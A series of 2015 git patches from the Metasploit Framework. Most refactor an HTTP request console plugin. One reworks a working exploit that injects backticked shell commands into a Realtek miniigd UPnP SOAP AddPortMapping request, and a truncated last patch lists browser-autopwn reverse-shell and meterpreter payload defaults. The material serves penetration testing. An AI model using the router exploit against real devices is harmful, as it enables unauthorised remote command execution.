       output_line(opts, response.body) if opts[:print_body]
-      opts[:output_file].close unless opts[:output_file].nil?
+      unless opts[:output_file].nil?
+        print_status("Wrote #{opts[:output_file].tell} bytes to #{opts[:output_file].path}")
+        opts[:output_file].close
+      end
     end
   end
 
   def initialize(framework, opts)
     super
     add_console_dispatcher(ConsoleCommandDispatcher)
-    print_status("#{name} plugin loaded.")
   end
 
   def cleanup

From 59f40d73e3a1afc2fcfbcb4a108d542a2ee59100 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 13 Mar 2015 13:13:18 -0400
Subject: [PATCH 0234/1013] Rename the requests plugin to http_requests

---
 plugins/{requests.rb => http_requests.rb} | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
 rename plugins/{requests.rb => http_requests.rb} (95%)

diff --git a/plugins/requests.rb b/plugins/http_requests.rb
similarity index 95%
rename from plugins/requests.rb
rename to plugins/http_requests.rb
index 9cc04b19ee..45b42e4d89 100644
--- a/plugins/requests.rb
+++ b/plugins/http_requests.rb
@@ -2,13 +2,13 @@ require 'uri'
 
 module Msf
 
-class Plugin::HTTPRequest < Msf::Plugin
+class Plugin::HTTPRequests < Msf::Plugin
 
   class ConsoleCommandDispatcher
     include Msf::Ui::Console::CommandDispatcher
 
     def name
-      'Request'
+      'HTTP Requests'
     end
 
     def commands
@@ -75,10 +75,10 @@ class Plugin::HTTPRequest < Msf::Plugin
           name, _, value = val.partition(':')
           options[:headers][name] = value.strip
         when '-i'
-          options[:print_headers]  = true
+          options[:print_headers] = true
         when '-I'
-          options[:print_headers]  = true
-          options[:print_body]     = false
+          options[:print_headers] = true
+          options[:print_body]    = false
           options[:method] ||= 'HEAD'
         when '-o'
           options[:output_file] = File.expand_path(val)
@@ -199,11 +199,11 @@ class Plugin::HTTPRequest < Msf::Plugin
   end
 
   def cleanup
-    remove_console_dispatcher('HTTP Request')
+    remove_console_dispatcher('HTTP Requests')
   end
 
   def name
-    'Requests'
+    'HTTP Requests'
   end
 
   def desc

From 2e8e350608f864b57ffff233c454f04448bd1443 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 24 Mar 2015 17:20:32 -0400
Subject: [PATCH 0235/1013] Rename the http_requests plugin and command to
 httpr

---
 plugins/{http_requests.rb => httpr.rb} | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
 rename plugins/{http_requests.rb => httpr.rb} (97%)

diff --git a/plugins/http_requests.rb b/plugins/httpr.rb
similarity index 97%
rename from plugins/http_requests.rb
rename to plugins/httpr.rb
index 45b42e4d89..07ad1ddc97 100644
--- a/plugins/http_requests.rb
+++ b/plugins/httpr.rb
@@ -13,12 +13,12 @@ class Plugin::HTTPRequests < Msf::Plugin
 
     def commands
       {
-        'http_request' => 'Make an HTTP request'
+        'httpr' => 'Make an HTTP request'
       }
     end
 
     def parse_args(args)
-      help_line = 'Usage: http_request [options] uri'
+      help_line = 'Usage: httpr [options] uri'
       opt_parser = Rex::Parser::Arguments.new(
         '-0' => [ false, 'Use HTTP 1.0' ],
         '-1' => [ false, 'Use TLSv1 (SSL)' ],
@@ -118,7 +118,7 @@ class Plugin::HTTPRequests < Msf::Plugin
       end
     end
 
-    def cmd_http_request(*args)
+    def cmd_httpr(*args)
       opts = parse_args(args)
       return unless opts
 

From cefec81dbd386b76d97a63f60f7df0bc1045d046 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Thu, 14 May 2015 21:21:18 -0500
Subject: [PATCH 0236/1013] move plugins/http to plugins/request

---
 plugins/{httpr.rb => request.rb} | 235 +++++++++++++++++--------------
 1 file changed, 133 insertions(+), 102 deletions(-)
 rename plugins/{httpr.rb => request.rb} (61%)

diff --git a/plugins/httpr.rb b/plugins/request.rb
similarity index 61%
rename from plugins/httpr.rb
rename to plugins/request.rb
index 07ad1ddc97..cd2a837a85 100644
--- a/plugins/httpr.rb
+++ b/plugins/request.rb
@@ -2,23 +2,68 @@ require 'uri'
 
 module Msf
 
-class Plugin::HTTPRequests < Msf::Plugin
+class Plugin::Requests < Msf::Plugin
 
   class ConsoleCommandDispatcher
     include Msf::Ui::Console::CommandDispatcher
 
     def name
-      'HTTP Requests'
+      'Request'
     end
 
     def commands
       {
-        'httpr' => 'Make an HTTP request'
+        'request' => 'Make a request of the specified type',
       }
     end
 
-    def parse_args(args)
-      help_line = 'Usage: httpr [options] uri'
+    def types
+      # dynamically figure out what types are supported based on parse_args_*
+      parse_methods = self.public_methods.select {|m| m.to_s =~ /^parse_args_/}
+      parse_methods.collect {|m| m.to_s.split('_').slice(2..-1).join('_')}
+    end
+
+    def cmd_request(*args)
+      # grab and validate the first arg as type, which will affect how the
+      # remaining args are parsed
+      type = args.shift
+      # short circuit the whole deal if they need help
+      return help if (!type || type =~ /^-?-h(?:elp)?$/)
+      type.downcase!
+      opts, opt_parser = parse_args(type, args)
+      if opts && opt_parser
+        if opts[:output_file]
+          begin
+            opts[:output_file] = File.new(opts[:output_file], 'w')
+          rescue ::Errno::EACCES, Errno::EISDIR, Errno::ENOTDIR
+            return help(opt_parser, 'Failed to open the specified file for output')
+          end
+        end
+        handler_method = "handle_request_#{type}".to_sym
+        if self.respond_to?(handler_method)
+          # call the appropriate request handler
+          self.send(handler_method, opts, opt_parser)
+        else
+          help(opt_parser, "No request handler found for type (#{type.to_s}).")
+        end
+      else
+        help(opt_parser, "No valid options provided for request #{type}")
+      end
+    end
+
+    def parse_args(type, args)
+      type.downcase!
+      #print_line "type is #{type}"
+      parse_method = "parse_args_#{type}".to_sym
+      if self.respond_to?(parse_method)
+        self.send(parse_method, args, type)
+      else
+        print_line('Unrecognized type.')
+        help
+      end
+    end
+
+    def parse_args_http(args = [], type = 'http')
       opt_parser = Rex::Parser::Arguments.new(
         '-0' => [ false, 'Use HTTP 1.0' ],
         '-1' => [ false, 'Use TLSv1 (SSL)' ],
@@ -37,15 +82,10 @@ class Plugin::HTTPRequests < Msf::Plugin
       )
 
       options = {
-        :auth_password   => nil,
-        :auth_username   => nil,
-        :headers         => { },
+        :headers         => {},
         :print_body      => true,
         :print_headers   => false,
-        :method          => nil,
-        :output_file     => nil,
         :ssl_version     => 'Auto',
-        :uri             => nil,
         :user_agent      => Rex::Proto::Http::Client::DefaultUserAgent,
         :version         => '1.1'
       }
@@ -68,11 +108,9 @@ class Plugin::HTTPRequests < Msf::Plugin
         when '-G'
           options[:method] = 'GET'
         when '-h'
-          print_line(help_line)
-          print_line(opt_parser.usage)
-          return
+          return help(opt_parser, "Usage: request #{type} [options] uri")
         when '-H'
-          name, _, value = val.partition(':')
+          name, _, value = val.split(':')
           options[:headers][name] = value.strip
         when '-i'
           options[:print_headers] = true
@@ -83,25 +121,83 @@ class Plugin::HTTPRequests < Msf::Plugin
         when '-o'
           options[:output_file] = File.expand_path(val)
         when '-u'
-          val = val.partition(':')
-          options[:auth_username] = val[0]
-          options[:auth_password] = val[2]
+          options[:auth_username] = val
+        when '-p'
+          options[:auth_password] = val
         when '-X'
           options[:method] = val
         else
           options[:uri] = val
         end
       end
-
-      if options[:uri].nil?
-        print_line(help_line)
-        print_line(opt_parser.usage)
-        return
+      unless options[:uri]
+        return help(opt_parser, "Usage: request #{type} [options] uri")
       end
-
       options[:method] ||= 'GET'
       options[:uri] = URI(options[:uri])
-      options
+      [options, opt_parser]
+    end
+
+    def handle_request_http(opts, opt_parser)
+      uri = opts[:uri]
+      http_client = Rex::Proto::Http::Client.new(
+        uri.host,
+        uri.port,
+        {'Msf' => framework},
+        uri.scheme == 'https',
+        opts[:ssl_version]
+      )
+
+      if opts[:auth_username]
+        auth_str = opts[:auth_username] + ':' + opts[:auth_password]
+        auth_str = 'Basic ' + Rex::Text.encode_base64(auth_str)
+        opts[:headers]['Authorization'] = auth_str
+      end
+
+      uri.path = '/' if uri.path.length == 0
+
+      begin
+        http_client.connect
+        req = http_client.request_cgi(
+          'agent'    => opts[:user_agent],
+          'data'     => opts[:data],
+          'headers'  => opts[:headers],
+          'method'   => opts[:method],
+          'password' => opts[:auth_password],
+          'query'    => uri.query,
+          'uri'      => uri.path,
+          'username' => opts[:auth_username],
+          'version'  => opts[:version]
+        )
+
+        response = http_client.send_recv(req)
+      rescue ::OpenSSL::SSL::SSLError
+        print_error('Encountered an SSL error')
+      rescue ::Errno::ECONNRESET => ex
+        print_error('The connection was reset by the peer')
+      rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
+        print_error('Encountered an error')
+      #rescue ::Exception => ex
+      #  print_line("An error of type #{ex.class} happened, message is #{ex.message}")
+      ensure
+        http_client.close
+      end
+
+      unless response
+        opts[:output_file].close if opts[:output_file]
+        return nil
+      end
+
+      if opts[:print_headers]
+        output_line(opts, response.cmd_string)
+        output_line(opts, response.headers.to_s)
+      end
+
+      output_line(opts, response.body) if opts[:print_body]
+      if opts[:output_file]
+        print_status("Wrote #{opts[:output_file].tell} bytes to #{opts[:output_file].path}")
+        opts[:output_file].close
+      end
     end
 
     def output_line(opts, line)
@@ -118,79 +214,15 @@ class Plugin::HTTPRequests < Msf::Plugin
       end
     end
 
-    def cmd_httpr(*args)
-      opts = parse_args(args)
-      return unless opts
-
-      unless opts[:output_file].nil?
-        begin
-          opts[:output_file] = File.new(opts[:output_file], 'w')
-        rescue ::Errno::EACCES, Errno::EISDIR, Errno::ENOTDIR
-          print_error('Failed to open the specified file for output')
-          return
-        end
-      end
-
-      uri = opts[:uri]
-      http_client = Rex::Proto::Http::Client.new(
-        uri.host,
-        uri.port,
-        {'Msf' => framework},
-        uri.scheme == 'https',
-        opts[:ssl_version]
-      )
-
-      unless opts[:auth_username].nil?
-        auth_str = opts[:auth_username].to_s + ':' + opts[:auth_password].to_s
-        auth_str = 'Basic ' + Rex::Text.encode_base64(auth_str)
-        opts[:headers]['Authorization'] = auth_str
-      end
-
-      uri.path = '/' if uri.path.length == 0
-
-      begin
-        http_client.connect
-        request = http_client.request_cgi(
-          'agent'    => opts[:user_agent],
-          'data'     => opts[:data],
-          'headers'  => opts[:headers],
-          'method'   => opts[:method],
-          'password' => opts[:auth_password],
-          'query'    => uri.query,
-          'uri'      => uri.path,
-          'username' => opts[:auth_username],
-          'version'  => opts[:version]
-        )
-
-        response = http_client.send_recv(request)
-      rescue ::OpenSSL::SSL::SSLError
-        print_error('Encountered an SSL error')
-      rescue ::Errno::ECONNRESET => ex
-        print_error('The connection was reset by the peer')
-      rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
-        print_error('Encountered an error')
-      #rescue ::Exception => ex
-      #  print_line("An error of type #{ex.class} happened, message is #{ex.message}")
-      ensure
-        http_client.close
-      end
-
-      unless response
-        opts[:output_file].close unless opts[:output_file].nil?
-        return
-      end
-
-      if opts[:print_headers]
-        output_line(opts, response.cmd_string)
-        output_line(opts, response.headers.to_s)
-      end
-
-      output_line(opts, response.body) if opts[:print_body]
-      unless opts[:output_file].nil?
-        print_status("Wrote #{opts[:output_file].tell} bytes to #{opts[:output_file].path}")
-        opts[:output_file].close
+    def help(opt_parser = nil, msg = 'Usage: request type [options]')
+      print_line(msg)
+      if opt_parser
+        print_line(opt_parser.usage)
+      else
+        print_line("Valid types are: #{types.join(', ')}")
       end
     end
+
   end
 
   def initialize(framework, opts)
@@ -199,18 +231,17 @@ class Plugin::HTTPRequests < Msf::Plugin
   end
 
   def cleanup
-    remove_console_dispatcher('HTTP Requests')
+    remove_console_dispatcher('Request')
   end
 
   def name
-    'HTTP Requests'
+    'Request'
   end
 
   def desc
-    'Make HTTP requests from within Metasploit.'
+    'Make requests from within Metasploit using various protocols.'
   end
 
-protected
-end
+end # end class
 
-end
+end # end module

From f1e48b93345de8e4f03ac69274464534dc71f087 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Wed, 27 May 2015 15:40:27 -0500
Subject: [PATCH 0237/1013] genericizes http request plugin

---
 plugins/request.rb | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/plugins/request.rb b/plugins/request.rb
index cd2a837a85..aeb4dbccec 100644
--- a/plugins/request.rb
+++ b/plugins/request.rb
@@ -13,7 +13,7 @@ class Plugin::Requests < Msf::Plugin
 
     def commands
       {
-        'request' => 'Make a request of the specified type',
+        'request' => "Make a request of the specified type (#{types.join(', ')})",
       }
     end
 
@@ -31,7 +31,9 @@ class Plugin::Requests < Msf::Plugin
       return help if (!type || type =~ /^-?-h(?:elp)?$/)
       type.downcase!
       opts, opt_parser = parse_args(type, args)
+
       if opts && opt_parser
+        # handle any "global" options
         if opts[:output_file]
           begin
             opts[:output_file] = File.new(opts[:output_file], 'w')
@@ -39,6 +41,7 @@ class Plugin::Requests < Msf::Plugin
             return help(opt_parser, 'Failed to open the specified file for output')
           end
         end
+        # hand off the actual request to the appropriate request handler
         handler_method = "handle_request_#{type}".to_sym
         if self.respond_to?(handler_method)
           # call the appropriate request handler
@@ -63,6 +66,7 @@ class Plugin::Requests < Msf::Plugin
       end
     end
 
+    # arg parsing for requests of type 'http'
     def parse_args_http(args = [], type = 'http')
       opt_parser = Rex::Parser::Arguments.new(
         '-0' => [ false, 'Use HTTP 1.0' ],
@@ -78,7 +82,9 @@ class Plugin::Requests < Msf::Plugin
         '-I' => [ false, 'Show document info only' ],
         '-o' => [ true,  'Write output to <file> instead of stdout' ],
         '-u' => [ true,  'Server user and password' ],
-        '-X' => [ true,  'Request method to use' ]
+        '-X' => [ true,  'Request method to use' ],
+        '-x' => [ true,  'Proxy to use, format: [proto://][user:pass@]host[:port]' +
+                          '  Proto defaults to http:// and port to 1080'],
       )
 
       options = {
@@ -126,6 +132,8 @@ class Plugin::Requests < Msf::Plugin
           options[:auth_password] = val
         when '-X'
           options[:method] = val
+        #when '-x'
+          # @TODO proxy
         else
           options[:uri] = val
         end
@@ -138,6 +146,7 @@ class Plugin::Requests < Msf::Plugin
       [options, opt_parser]
     end
 
+    # handling for requests of type 'http'
     def handle_request_http(opts, opt_parser)
       uri = opts[:uri]
       http_client = Rex::Proto::Http::Client.new(

From 7d896ba5d2129a468cea97e4d7b785d1e8803330 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Wed, 27 May 2015 15:44:53 -0500
Subject: [PATCH 0238/1013] removes a proxy vestige

---
 plugins/request.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/plugins/request.rb b/plugins/request.rb
index aeb4dbccec..6b6d4d82cb 100644
--- a/plugins/request.rb
+++ b/plugins/request.rb
@@ -82,9 +82,9 @@ class Plugin::Requests < Msf::Plugin
         '-I' => [ false, 'Show document info only' ],
         '-o' => [ true,  'Write output to <file> instead of stdout' ],
         '-u' => [ true,  'Server user and password' ],
-        '-X' => [ true,  'Request method to use' ],
-        '-x' => [ true,  'Proxy to use, format: [proto://][user:pass@]host[:port]' +
-                          '  Proto defaults to http:// and port to 1080'],
+        '-X' => [ true,  'Request method to use' ]
+        #'-x' => [ true,  'Proxy to use, format: [proto://][user:pass@]host[:port]' +
+        #                 '  Proto defaults to http:// and port to 1080'],
       )
 
       options = {

From b236187e3f428a48e2ede0e1228886343ede31f0 Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Thu, 28 May 2015 11:42:33 -0500
Subject: [PATCH 0239/1013] restores proper -u usage

---
 plugins/request.rb | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/plugins/request.rb b/plugins/request.rb
index 6b6d4d82cb..908e3c2fd9 100644
--- a/plugins/request.rb
+++ b/plugins/request.rb
@@ -127,7 +127,12 @@ class Plugin::Requests < Msf::Plugin
         when '-o'
           options[:output_file] = File.expand_path(val)
         when '-u'
-          options[:auth_username] = val
+          val = val.split(':', 2) # only split on first ':' as per curl:
+          # from curl man page: "The user name and passwords are split up on the
+          # first colon, which makes it impossible to use a colon in the user
+          # name with this option.  The password can, still.
+          options[:auth_username] = val.first
+          options[:auth_password] = val.last
         when '-p'
           options[:auth_password] = val
         when '-X'
@@ -186,8 +191,6 @@ class Plugin::Requests < Msf::Plugin
         print_error('The connection was reset by the peer')
       rescue ::EOFError, Errno::ETIMEDOUT, Rex::ConnectionError, ::Timeout::Error
         print_error('Encountered an error')
-      #rescue ::Exception => ex
-      #  print_line("An error of type #{ex.class} happened, message is #{ex.message}")
       ensure
         http_client.close
       end

From fa9a222d97f65b6b9294223142aacc018552ba6e Mon Sep 17 00:00:00 2001
From: Joshua Smith <kernelsmith@metasploit.com>
Date: Thu, 28 May 2015 21:38:43 -0500
Subject: [PATCH 0240/1013] changes type handling to be fully automatic

---
 plugins/request.rb | 61 +++++++++++++++++++++++++++++++++-------------
 1 file changed, 44 insertions(+), 17 deletions(-)

diff --git a/plugins/request.rb b/plugins/request.rb
index 908e3c2fd9..f503950a55 100644
--- a/plugins/request.rb
+++ b/plugins/request.rb
@@ -7,6 +7,8 @@ class Plugin::Requests < Msf::Plugin
   class ConsoleCommandDispatcher
     include Msf::Ui::Console::CommandDispatcher
 
+    HELP_REGEX = /^-?-h(?:elp)?$/
+
     def name
       'Request'
     end
@@ -24,14 +26,21 @@ class Plugin::Requests < Msf::Plugin
     end
 
     def cmd_request(*args)
-      # grab and validate the first arg as type, which will affect how the
-      # remaining args are parsed
-      type = args.shift
       # short circuit the whole deal if they need help
-      return help if (!type || type =~ /^-?-h(?:elp)?$/)
-      type.downcase!
-      opts, opt_parser = parse_args(type, args)
+      return help if args.length == 0
+      return help if args.length == 1 && args.first =~ HELP_REGEX
 
+      # detect the request type from the uri which must be the last arg given
+      uri = args.last
+      if uri && uri =~ /^[A-Za-z]{3,5}:\/\//
+        type = uri.split('://', 2).first
+      else
+        print_error("The last argument must be a valid and supported URI")
+        return help
+      end
+
+      # parse options
+      opts, opt_parser = parse_args(args, type)
       if opts && opt_parser
         # handle any "global" options
         if opts[:output_file]
@@ -47,25 +56,34 @@ class Plugin::Requests < Msf::Plugin
           # call the appropriate request handler
           self.send(handler_method, opts, opt_parser)
         else
+          # this should be dead code if parse_args is doing it's job correctly
           help(opt_parser, "No request handler found for type (#{type.to_s}).")
         end
       else
-        help(opt_parser, "No valid options provided for request #{type}")
+        if types.include? type
+          help(opt_parser)
+        else
+          help
+        end
       end
     end
 
-    def parse_args(type, args)
+    def parse_args(args, type = 'http')
       type.downcase!
-      #print_line "type is #{type}"
       parse_method = "parse_args_#{type}".to_sym
       if self.respond_to?(parse_method)
         self.send(parse_method, args, type)
       else
-        print_line('Unrecognized type.')
-        help
+        print_error("Unsupported URI type: #{type}")
       end
     end
 
+    # arg parsing for requests of type 'http'
+    def parse_args_https(args = [], type = 'https')
+      # just let http do it
+      parse_args_http(args, type)
+    end
+
     # arg parsing for requests of type 'http'
     def parse_args_http(args = [], type = 'http')
       opt_parser = Rex::Parser::Arguments.new(
@@ -113,10 +131,12 @@ class Plugin::Requests < Msf::Plugin
           options[:method] ||= 'POST'
         when '-G'
           options[:method] = 'GET'
-        when '-h'
-          return help(opt_parser, "Usage: request #{type} [options] uri")
+        when HELP_REGEX
+          #help(opt_parser)
+          # guard to prevent further option processing & stymie request handling
+          return [nil, opt_parser]
         when '-H'
-          name, _, value = val.split(':')
+          name, value = val.split(':', 2)
           options[:headers][name] = value.strip
         when '-i'
           options[:print_headers] = true
@@ -144,13 +164,19 @@ class Plugin::Requests < Msf::Plugin
         end
       end
       unless options[:uri]
-        return help(opt_parser, "Usage: request #{type} [options] uri")
+        help(opt_parser)
       end
       options[:method] ||= 'GET'
       options[:uri] = URI(options[:uri])
       [options, opt_parser]
     end
 
+    # handling for requests of type 'https'
+    def handle_request_https(opts, opt_parser)
+      # let http do it
+      handle_request_http(opts, opt_parser)
+    end
+
     # handling for requests of type 'http'
     def handle_request_http(opts, opt_parser)
       uri = opts[:uri]
@@ -226,12 +252,13 @@ class Plugin::Requests < Msf::Plugin
       end
     end
 
-    def help(opt_parser = nil, msg = 'Usage: request type [options]')
+    def help(opt_parser = nil, msg = 'Usage: request [options] uri')
       print_line(msg)
       if opt_parser
         print_line(opt_parser.usage)
       else
-        print_line("Valid types are: #{types.join(', ')}")
+        print_line("Supported uri types are: #{types.collect{|t| t + '://'}.join(', ')}")
+        print_line("To see usage for a specific uri type, use request -h uri")
       end
     end
 

From 16bc08861a77f091dc934e627fbf2b31999521b0 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 29 May 2015 13:01:26 -0500
Subject: [PATCH 0241/1013] update to metasploit-payloads 1.0.0

---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 1723828a2a..b0fb3003b0 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 0.0.7)
+      metasploit-payloads (= 1.0.0)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (0.0.7)
+    metasploit-payloads (1.0.0)
     metasploit_data_models (1.1.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 41d93d8c7c..4b46084af7 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '0.0.7'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.0'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From 9ebd6e5d6e57f89d0ca163ff2fd50a7146936a43 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 13:27:19 -0500
Subject: [PATCH 0242/1013] Use REXML

---
 .../http/realtek_miniigd_upnp_exec_noauth.rb  | 87 ++++++++++++-------
 1 file changed, 55 insertions(+), 32 deletions(-)

diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
index 2bc2cd6d25..8806f177b8 100644
--- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -17,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'Description' => %q{
         Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
         injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
-        there is no output for the executed command.
-        This module has been tested in emulation on a Trendnet TEW-731BR router.
+        there is no output for the executed command. This module has been tested successfully on a
+        Trendnet TEW-731BR router with emulation.
       },
       'Author'      =>
         [
@@ -52,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
             }
-          ],
+          ]
         ],
       'DefaultTarget'    => 0
       ))
@@ -91,37 +92,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     execute_cmdstager(
       :flavor  => :echo,
-      :linemax => 50
+      :linemax => 50,
+      :nodelete => true
     )
   end
 
   def execute_command(cmd, opts)
     uri = '/wanipcn.xml'
-
-    new_portmapping_descr = rand_text_alpha(8)
-    new_external_port = rand(32767) + 32768
-    new_internal_port = rand(32767) + 32768
-
-    # We need something like this:
-    #cmd = "echo -en \\\x7f\\\x45\\\x4c\\\x46\\\x01  > /var/tmp/pwdn"
-    cmd = cmd.gsub("\\\\", "\\\\\\\\\\")
-
-    soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
-
-    data_cmd = "<?xml version=\"1.0\"?>"
-    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
-    data_cmd << "<SOAP-ENV:Body>"
-    data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-    data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
-    data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
-    data_cmd << "<NewEnabled>1</NewEnabled>"
-    data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
-    data_cmd << "<NewRemoteHost></NewRemoteHost>"
-    data_cmd << "<NewProtocol>TCP</NewProtocol>"
-    data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
-    data_cmd << "</m:AddPortMapping>"
-    data_cmd << "</SOAP-ENV:Body>"
-    data_cmd << "</SOAP-ENV:Envelope>"
+    soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
+    data_cmd = '<?xml version="1.0"?>' + build_soap_req
 
     begin
       res = send_request_cgi({
@@ -129,16 +108,60 @@ class Metasploit3 < Msf::Exploit::Remote
         'vars_get' => {
           'service' => 'WANIPConn1'
         },
-        'ctype' => "text/xml",
+        'ctype' => 'text/xml',
         'method' => 'POST',
         'headers' => {
-          'SOAPAction' => soapaction,
+          'SOAPAction' => soap_action
           },
-        'data' => data_cmd
+        'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`")
       })
       return res
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
+
+  def build_soap_req
+    new_external_port = rand(32767) + 32768
+    new_internal_port = rand(32767) + 32768
+
+    xml = Document.new
+
+    xml.add_element(
+      'SOAP-ENV:Envelope',
+      {
+        'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
+        'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
+      })
+
+    xml.root.add_element('SOAP-ENV:Body')
+
+    body = xml.root.elements[1]
+
+    body.add_element(
+      'm:AddPortMapping',
+      {
+        'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'
+      })
+
+    port_mapping = body.elements[1]
+    port_mapping.add_element('NewLeaseDuration')
+    port_mapping.add_element('NewInternalClient')
+    port_mapping.add_element('NewEnabled')
+    port_mapping.add_element('NewExternalPort')
+    port_mapping.add_element('NewRemoteHost')
+    port_mapping.add_element('NewProtocol')
+    port_mapping.add_element('NewInternalPort')
+
+    port_mapping.elements['NewLeaseDuration'].text  = ''
+    port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'
+    port_mapping.elements['NewEnabled'].text        = '1'
+    port_mapping.elements['NewExternalPort'].text   = "#{new_external_port}"
+    port_mapping.elements['NewRemoteHost'].text     = ''
+    port_mapping.elements['NewProtocol'].text       = 'TCP'
+    port_mapping.elements['NewInternalPort'].text   = "#{new_internal_port}"
+
+    xml.to_s
+  end
+
 end

From dab9a66ea362705799d154b6800b79409e8c3b66 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 13:43:20 -0500
Subject: [PATCH 0243/1013] Use current ruby hash syntax

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 28 +++++++++++------------
 modules/exploits/multi/browser/autopwn.rb |  4 ++--
 2 files changed, 16 insertions(+), 16 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 1ad9b4a24b..c020e6161d 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -31,14 +31,14 @@ module Msf
     # The loader order is specific while starting them up.
     # Firefox payloads use generic handlers.
     DEFAULT_PAYLOADS = {
-      'firefox' => { 'payload' => 'firefox/shell_reverse_tcp',         'lport' => 4442 },
-      'android' => { 'payload' => 'android/meterpreter/reverse_tcp',   'lport' => 4443 },
-      'win'     => { 'payload' => 'windows/meterpreter/reverse_tcp',   'lport' => 4444 },
-      'linux'   => { 'payload' => 'linux/x86/meterpreter/reverse_tcp', 'lport' => 4445 },
-      'unix'    => { 'payload' => 'cmd/unix/reverse',                  'lport' => 4446 },
-      'osx'     => { 'payload' => 'osx/x86/shell_reverse_tcp',         'lport' => 4447 },
-      'java'    => { 'payload' => 'java/meterpreter/reverse_tcp',      'lport' => 4448 },
-      'generic' => { 'payload' => 'generic/shell_reverse_tcp',         'lport' => 4459 }
+      firefox: { payload: 'firefox/shell_reverse_tcp',         lport: 4442 },
+      android: { payload: 'android/meterpreter/reverse_tcp',   lport: 4443 },
+      win:     { payload: 'windows/meterpreter/reverse_tcp',   lport: 4444 },
+      linux:   { payload: 'linux/x86/meterpreter/reverse_tcp', lport: 4445 },
+      unix:    { payload: 'cmd/unix/reverse',                  lport: 4446 },
+      osx:     { payload: 'osx/x86/shell_reverse_tcp',         lport: 4447 },
+      java:    { payload: 'java/meterpreter/reverse_tcp',      lport: 4448 },
